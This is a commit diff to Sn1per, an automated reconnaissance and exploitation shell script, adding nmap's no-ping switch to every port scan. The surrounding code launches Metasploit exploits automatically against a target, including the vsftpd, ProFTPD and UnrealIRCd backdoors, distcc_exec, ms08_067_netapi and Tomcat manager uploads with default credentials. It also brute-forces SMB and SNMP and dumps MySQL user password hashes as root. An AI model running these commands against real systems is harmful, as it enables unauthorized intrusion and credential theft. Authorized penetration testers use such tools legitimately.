Sn1per by 1N3@CrowdShield

CHANGELOG.md

@@ -1,4 +1,5 @@
 ## CHANGELOG:
+* v2.4e - Added NMap no ping switch to all scans
 * v2.4d - Fixed issue with rpcinfo install script
 * v2.4d - Fixed issue with Arachni install script
 * v2.4c - Added loot and $TARGET sanity checks (CC. @menzow)

sniper

@@ -391,7 +391,7 @@ if [ "$MODE" = "stealth" ]; then
 	fi
 	echo ""
 	echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
-	nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 	
 	port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
 	port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -536,7 +536,7 @@ if [ "$MODE" = "airstrike" ]; then
 		fi
 		echo ""
 		echo -e "$OKGREEN + -- ----------------------------=[Running port scan]=------------------- -- +$RESET"
-		nmap -sS -T5 --open -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
+		nmap -sS -T5 --open -P0 -p $DEFAULT_PORTS $a -oX $LOOT_DIR/nmap/nmap-$a.xml
 		
 		port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
 		port_443=`grep 'portid="443"' $LOOT_DIR/nmap/nmap-$a.xml | grep open`
@@ -781,7 +781,7 @@ then
 	echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"	
-	nmap -A -sV  -sC -T5 -p 21 --script=ftp-* $TARGET
+	nmap -A -sV -P0 -sC -T5 -p 21 --script=ftp-* $TARGET
 	msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi
 
@@ -793,7 +793,7 @@ else
 	cd $PLUGINS_DIR/ssh-audit
 	python ssh-audit.py $TARGET:22
 	cd $INSTALL_DIR
-	nmap -A -sV  -sC -T5 -p 22 --script=ssh-* $TARGET
+	nmap -A -sV -P0 -sC -T5 -p 22 --script=ssh-* $TARGET
 	msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
 fi
 
@@ -804,7 +804,7 @@ else
 	echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
 	echo ""
 	cisco-torch -A $TARGET
-	nmap -A -sV  -T5 --script=telnet* -p 23 $TARGET
+	nmap -A -sV -P0 -T5 --script=telnet* -p 23 $TARGET
 	msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
 fi
 
@@ -813,7 +813,7 @@ then
 	echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=smtp* -p 25 $TARGET
+	nmap -A -sV -P0 -T5 --script=smtp* -p 25 $TARGET
 	smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
 	msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;" 
 fi
@@ -823,7 +823,7 @@ then
 	echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
-	nmap -A -sU -sV  -T5 --script=dns* -p U:53,T:53 $TARGET	
+	nmap -A -sU -sV -P0 -T5 --script=dns* -p U:53,T:53 $TARGET	
 fi
 
 if [ -z "$port_79" ];
@@ -831,7 +831,7 @@ then
 	echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=finger* -p 79 $TARGET
+	nmap -A -sV -P0 -T5 --script=finger* -p 79 $TARGET
 	bin/fingertool.sh $TARGET $USER_FILE
 fi
 
@@ -908,7 +908,7 @@ else
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -A  -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
+		nmap -A -P0 -T5 -p 80 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb http://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1009,7 +1009,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
 	for a in `cat /usr/share/brutex/wordlists/snmp-strings.txt`; do snmpwalk $TARGET -c $a; done;
-	nmap -A -p 162 --script=snmp* $TARGET
+	nmap -A -p 162 -P0 --script=snmp* $TARGET
 fi
 
 if [ -z "$port_389" ];
@@ -1017,7 +1017,7 @@ then
 	echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
-	nmap -A -p 389 -T5 --script=ldap* $TARGET
+	nmap -A -p 389 -P0 -T5 --script=ldap* $TARGET
 fi
 
 if [ -z "$port_443" ];
@@ -1099,7 +1099,7 @@ else
 	if [ "$MODE" = "web" ];
 	then
 		echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
-		nmap -A -sV -T5 -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
+		nmap -A -sV -T5 -P0 -p 443 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
 		dirb https://$TARGET
 		echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1161,7 +1161,7 @@ else
 	enum4linux $TARGET
 	python $SAMRDUMP $TARGET
 	nbtscan $TARGET
-	nmap -A -sV  -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
+	nmap -A -sV -P0 -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
 	msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
 fi
 
@@ -1170,7 +1170,7 @@ then
 	echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
-	nmap -A -sV -T5 -p 512 --script=rexec* $TARGET
+	nmap -A -sV -P0 -T5 -p 512 --script=rexec* $TARGET
 fi
 
 if [ -z "$port_513" ]
@@ -1178,7 +1178,7 @@ then
 	echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
-	nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET
+	nmap -A -sV -T5 -P0 -p 513 --script=rlogin* $TARGET
 fi
 
 if [ -z "$port_514" ];
@@ -1195,7 +1195,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 623 opened... running tests...$RESET"
 	amap $TARGET 623 -A
-	nmap -A -sV -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET
+	nmap -A -sV -P0 -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 623 $TARGET
 fi
 
 if [ -z "$port_624" ];
@@ -1204,7 +1204,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 624 opened... running tests...$RESET"
 	amap $TARGET 624 -A
-	nmap -A -sV -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET
+	nmap -A -sV -P0 -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 624 $TARGET
 fi
 
 if [ -z "$port_1099" ];
@@ -1213,7 +1213,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 1099 opened... running tests...$RESET"
 	amap $TARGET 1099 -A
-	nmap -A -sV -T5 -p 1099 --script=rmi-* $TARGET
+	nmap -A -sV -P0 -T5 -p 1099 --script=rmi-* $TARGET
 	msfconsole -x "use gather/java_rmi_registry; set RHOST "$TARGET"; run;"
 	msfconsole -x "use scanner/misc/java_rmi_server; set RHOST "$TARGET"; run;"
 fi
@@ -1223,7 +1223,7 @@ then
 	echo -e "$OKRED + -- --=[Port 1433 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 1433 opened... running tests...$RESET"
-	nmap -A -sV -T5 --script=ms-sql* -p 1433 $TARGET
+	nmap -A -sV -P0 -T5 --script=ms-sql* -p 1433 $TARGET
 fi
 
 if [ -z "$port_2049" ];
@@ -1231,7 +1231,7 @@ then
 	echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=nfs* -p 2049 $TARGET
+	nmap -A -sV -P0 -T5 --script=nfs* -p 2049 $TARGET
 	rpcinfo -p $TARGET
 	showmount -e $TARGET
 	smbclient -L $TARGET -U " "%" "
@@ -1242,7 +1242,7 @@ then
 	echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=ftp* -p 2121 $TARGET
+	nmap -A -sV -P0 -T5 --script=ftp* -p 2121 $TARGET
 	msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
 fi
 
@@ -1251,7 +1251,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
-	nmap -A -sV  --script=mysql* -p 3306 $TARGET
+	nmap -A -sV -P0 --script=mysql* -p 3306 $TARGET
 	mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
 fi
 
@@ -1260,7 +1260,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
-	nmap -A -p 3310 -T5 -sV  --script clamav-exec $TARGET
+	nmap -A -p 3310 -P0 -T5 -sV  --script clamav-exec $TARGET
 fi
 
 if [ -z "$port_3128" ];
@@ -1268,7 +1268,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
-	nmap -A -p 3128 -T5 -sV  --script=*proxy* $TARGET
+	nmap -A -p 3128 -P0 -T5 -sV  --script=*proxy* $TARGET
 fi
 
 if [ -z "$port_3389" ];
@@ -1276,7 +1276,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=rdp-* -p 3389 $TARGET
+	nmap -A -sV -P0 -T5 --script=rdp-* -p 3389 $TARGET
 	rdesktop $TARGET &
 fi
 
@@ -1285,7 +1285,7 @@ then
 	echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=distcc-* -p 3632 $TARGET
+	nmap -A -sV -P0 -T5 --script=distcc-* -p 3632 $TARGET
 	msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
 fi
 
@@ -1306,7 +1306,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h https://$TARGET:4443 
 	cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
-	nmap -sV  -A -p 4443 -T5 --script=*proxy* $TARGET
+	nmap -sV -P0 -A -p 4443 -T5 --script=*proxy* $TARGET
 fi
 
 if [ -z "$port_5432" ];
@@ -1314,7 +1314,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
-	nmap -A -sV  --script=pgsql-brute -p 5432 $TARGET
+	nmap -A -sV -P0 --script=pgsql-brute -p 5432 $TARGET
 fi
 
 if [ -z "$port_5800" ];
@@ -1322,7 +1322,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=vnc* -p 5800 $TARGET
+	nmap -A -sV -P0 -T5 --script=vnc* -p 5800 $TARGET
 fi
 
 if [ -z "$port_5900" ];
@@ -1338,7 +1338,7 @@ then
 	echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=couchdb* -p 5984 $TARGET
+	nmap -A -sV -P0 -T5 --script=couchdb* -p 5984 $TARGET
 	msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
 fi
 
@@ -1347,7 +1347,7 @@ then
 	echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=x11* -p 6000 $TARGET
+	nmap -A -sV -P0 -T5 --script=x11* -p 6000 $TARGET
 	msfconsole -x "use auxiliary/scanner/x11/open_x11; set RHOSTS "$TARGET"; exploit;"
 fi
 
@@ -1356,7 +1356,7 @@ then
 	echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
-	nmap -A -sV  -T5 --script=irc* -p 6667 $TARGET
+	nmap -A -sV -P0 -T5 --script=irc* -p 6667 $TARGET
 	msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
 fi
 
@@ -1373,7 +1373,7 @@ else
 	cd ..
 	nikto -h http://$TARGET:8000 
 	cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
 fi
 
 if [ -z "$port_8100" ];
@@ -1392,7 +1392,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8100 
 	cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
 fi
 
 if [ -z "$port_8080" ];
@@ -1411,7 +1411,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8080 
 	cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
 	msfconsole -x "use admin/http/jboss_bshdeployer; setg RHOST "$TARGET"; run; use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
 	# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
 	# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1434,7 +1434,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h http://$TARGET:8180 
 	cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
 	echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
 	msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1457,7 +1457,7 @@ else
 	cd $INSTALL_DIR
 	nikto -h https://$TARGET:8443 
 	cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
 fi
 
 if [ -z "$port_8888" ];
@@ -1472,7 +1472,7 @@ else
 	xsstracer $TARGET 8888
 	nikto -h http://$TARGET:8888 
 	cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
-	nmap -sV  --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse  -A -p 8888 -T5 $TARGET
+	nmap -sV -P0 --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse  -A -p 8888 -T5 $TARGET
 fi
 
 if [ -z "$port_10000" ];
@@ -1491,7 +1491,7 @@ then
 else
 	echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
 	amap $TARGET 16992 -A
-	nmap -A -sV -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
+	nmap -A -sV -P0 -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
 fi
 
 if [ -z "$port_27017" ];
@@ -1499,7 +1499,7 @@ then
 	echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
-	nmap -sV --script  -p 27017 -T5 --script=mongodb* $TARGET
+	nmap -sV -p 27017 -P0 -T5 --script=mongodb* $TARGET
 fi
 
 if [ -z "$port_27018" ];
@@ -1507,7 +1507,7 @@ then
 	echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
-	nmap -sV  -p 27018 -T5 --script=mongodb* $TARGET
+	nmap -sV  -p 27018 -P0 -T5 --script=mongodb* $TARGET
 fi
 
 if [ -z "$port_27019" ];
@@ -1515,7 +1515,7 @@ then
 	echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
-	nmap -sV  -p 27019 -T5 --script=mongodb* $TARGET
+	nmap -sV  -p 27019 -P0 -T5 --script=mongodb* $TARGET
 fi
 
 if [ -z "$port_28017" ];
@@ -1523,7 +1523,7 @@ then
 	echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
 else
 	echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
-	nmap -sV  -p 28017 -T5 --script=mongodb* $TARGET
+	nmap -sV  -p 28017 -P0 -T5 --script=mongodb* $TARGET
 fi
 
 if [ -z "$port_49152" ];
@@ -1543,7 +1543,7 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
 	echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
 else
 	echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
-	nmap -T4 -sV  -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
+	nmap -P0 -T4 -sV  -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
 fi
 
 if [ "$AUTOBRUTE" = "0" ]; then